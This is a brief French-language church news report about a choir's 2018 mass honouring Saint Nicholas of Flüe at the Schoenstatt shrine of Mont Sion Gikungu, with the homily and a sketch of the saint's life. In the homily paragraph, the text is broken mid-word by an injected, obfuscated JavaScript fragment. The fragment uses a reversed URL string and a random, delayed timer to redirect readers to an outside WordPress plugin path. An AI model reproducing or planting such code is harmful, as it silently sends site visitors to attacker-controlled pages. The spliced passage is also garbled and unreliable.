C’était au Sanctuaire marial de Schoenstatt Mont Sion Gikungu, la Chorale Saint Nicolas de Fluë était en train de célébrer une messe en mémoire de Saint Patron. Cette messe a commencé à 17h précises de ce 25 septembre 2018 et était présidée par le Père Longin NTIRANYIBAGIRA.
Dans l’homélie, le Père Longin a dit qu’en ce jour du Saint Nicolas de Fluë, le Sanctuaire marial de Schoenstatt Mont Sion Gikungu a un signe palpable, une chorale qui a pris ce Saint comme Patron et qui a voulu suivre son idéal. Il a rappelé que l’exemple de Saint Nicolas de Fluë ne réside pas à chanter à l’église mais touche sur tous les toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domaines de la vie sociale.
Saint Nicolas de Fluë était né à Sachseln en 1417 et mort dans cette même localité le 21 mars 1487. Il a été béatifié en 1648 et canonisé à Rome en 1947 par le Pape Pie XII. Il avait l’idéal de la paix et il est vénéré dans l’église catholique le 25 septembre.
Après la messe au Sanctuaire, tous les choristes se sont dirigés vers la Chapelle Eucharistique où se trouve la statue de Saint Nicolas et où ils ont chanté la prière de Saint Nicolas de Fluë
Jean de Dieu